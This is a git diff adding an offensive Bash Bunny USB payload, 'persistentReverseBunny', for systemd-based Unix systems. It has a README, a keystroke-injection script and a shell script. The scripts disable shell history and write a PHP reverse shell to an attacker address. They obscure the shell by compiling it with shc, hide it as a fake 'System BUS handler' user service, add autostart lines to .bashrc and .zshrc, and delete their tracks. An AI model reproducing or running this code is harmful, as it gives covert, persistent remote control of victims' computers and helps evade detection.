diff --git a/payloads/library/remote_access/persistentReverseBunny/README.md b/payloads/library/remote_access/persistentReverseBunny/README.md
new file mode 100644
index 00000000..e8ea4c13
--- /dev/null
+++ b/payloads/library/remote_access/persistentReverseBunny/README.md
@@ -0,0 +1,36 @@
+## About:
+* Title: persistentReverseBunny
+* Description: persistentReverseBunny provides you persistent reverse shell remotely/locally.
+* AUTHOR: drapl0n
+* Version: 1.0
+* Category: Remote Access
+* Target: Unix-like operating systems with systemd.
+* Attackmodes: HID, STORAGE
+
+## persistentReverseBunny: provides you persistent encoded reverse shell remotely/locally within 15 secs.
+
+### Workflow:
+Keeping tracks clear by disabling and deleting history. Creating hidden directory to store payload. Creating payload mechanism and compiling it for obfuscation, which checks whether internet is connected to the target system, if yes then it creates reverse shell to attackers machine. Creating non-root systemd service to keep payload running in background. Enabling service. Autostarting service on trigger of terminal emulator or shell.
+
+### Algorithm:
+1. Stop storing history, this helps to keep tracks clear from begining.
+2. Creating reverse shell.
+3. Creating non-root systemd service.
+4. Enabling service.
+5. Starting service on trigger of firing terminal emulator/shell.
+
+### LED Status:
+* `SETUP` : MAGENTA
+* `ATTACK` : YELLOW
+* `FINISH` : GREEN
+
+### Directory Structure of payload components:
+| FileName | Directory |
+| ----------------------- | ----------------------------- |
+| payload.txt | /payloads/switch1/ |
+| persistentReverseBunny/ | /payloads/libray/ |
+
+### Note:
+* Change ip address(0.0.0.0) and port number(4444) to your server's ip address and port number in `reversePersistentBunny/payload.sh` on line `6`.
+#### Support me if you like my work:
+* https://twitter.com/drapl0n
diff --git a/payloads/library/remote_access/persistentReverseBunny/payload.txt b/payloads/library/remote_access/persistentReverseBunny/payload.txt
new file mode 100644
index 00000000..de367d14
--- /dev/null
+++ b/payloads/library/remote_access/persistentReverseBunny/payload.txt
@@ -0,0 +1,51 @@
+# Description: persistentReverseBunny provides you persistent and ofuscated reverse shell remotely/locally within 15 secs.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Remote Access
+# Target: Unix-like operating systems with systemd.
+# Attackmodes: HID, Storage
+
+LED SETUP
+ATTACKMODE STORAGE HID
+GET SWITCH_POSITION
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Fetching BashBunny's block device]
+Q STRING lol='$(lsblk | grep 1.8G)'
+Q ENTER
+Q DELAY 100
+Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
+Q ENTER
+Q DELAY 200
+
+# [Mounting BashBunny]
+Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
+Q ENTER
+Q DELAY 2000
+Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
+Q ENTER
+Q DELAY 500
+
+# [transfering payload script]
+Q STRING cp -r '$mntt'/payloads/library/persistentReverseBunny/payload.sh /tmp/
+Q ENTER
+Q STRING chmod +x /tmp/payload.sh
+Q ENTER
+Q STRING /tmp/./payload.sh \&
+Q ENTER
+Q STRING disown
+Q ENTER
+Q STRING udisksctl unmount -b /dev/'$disk'
+Q ENTER
+Q DELAY 500
+Q STRING exit
+Q ENTER
+LED FINISH
diff --git a/payloads/library/remote_access/persistentReverseBunny/persistentReverseBunny/payload.sh b/payloads/library/remote_access/persistentReverseBunny/persistentReverseBunny/payload.sh
new file mode 100644
index 00000000..edd304f3
--- /dev/null
+++ b/payloads/library/remote_access/persistentReverseBunny/persistentReverseBunny/payload.sh
@@ -0,0 +1,18 @@
+#!/bin/bash
+lol=$(lsblk | grep 1.8G)
+disk=$(echo $lol | awk '{print $1}')
+mntt=$(lsblk | grep $disk | awk '{print $7}')
+mkdir /var/tmp/.system/
+echo -e "#!"/bin/bash"\nwhile :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/bin/sh -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/pop
+cp -r $mntt/payloads/library/persistentReverseBunny/shc /var/tmp/.system/
+chmod +x /var/tmp/.system/shc
+/var/tmp/.system/./shc -f /var/tmp/.system/pop -o /var/tmp/.system/systemBus
+chmod +x /var/tmp/.system/systemBus
+rm /var/tmp/.system/pop*
+mkdir -p ~/.config/systemd/user
+echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
+systemctl --user daemon-reload
+systemctl --user enable --now systemBUS.service
+systemctl --user start --now systemBUS.service
+echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ $? = 0 ]; then\n\techo systemctl --user enable --now systemBUS.service >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ $? = 0 ]; then\n\techo systemctl --user enable --now systemBUS.service >> ~/.bashrc\nfi\n\n" > ~/tmmmp
+chmod +x ~/tmmmp && ~/./tmmmp && rm ~/tmmmp && rm /tmp/payload.sh && rm /var/tmp/.system/shc
diff --git a/payloads/library/remote_access/persistentReverseBunny/persistentReverseBunny/shc b/payloads/library/remote_access/persistentReverseBunny/persistentReverseBunny/shc
new file mode 100644
index 00000000..8e7c686c
Binary files /dev/null and b/payloads/library/remote_access/persistentReverseBunny/persistentReverseBunny/shc differ